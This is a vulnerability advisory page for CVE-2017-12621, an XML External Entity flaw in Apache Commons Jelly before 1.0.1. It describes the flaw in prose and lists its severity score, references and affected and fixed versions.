Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS02ZzMzLTgyZ2MtM3B3Nc4AAYbA
Improper Restriction of XML External Entity Reference in Jelly
During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache Commons Jelly before 1.0.1.
Permalink: https://github.com/advisories/GHSA-6g33-82gc-3pw5JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZzMzLTgyZ2MtM3B3Nc4AAYbA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: about 2 years ago
Updated: over 1 year ago
CVSS Score: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-6g33-82gc-3pw5, CVE-2017-12621
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12621
- https://issues.apache.org/jira/browse/JELLY-293
- https://lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73@%3Cdev.commons.apache.org%3E
- https://web.archive.org/web/20200227144849/http://www.securityfocus.com/bid/101052
- https://web.archive.org/web/20210303081618/http://www.securitytracker.com/id/1039444
- https://github.com/advisories/GHSA-6g33-82gc-3pw5
Affected Packages
maven:commons-jelly:commons-jelly
Dependent packages: 82Dependent repositories: 29
Downloads:
Affected Version Ranges: <= 1.0
Fixed in: 1.0.1
All affected versions: 1.0.1
All unaffected versions: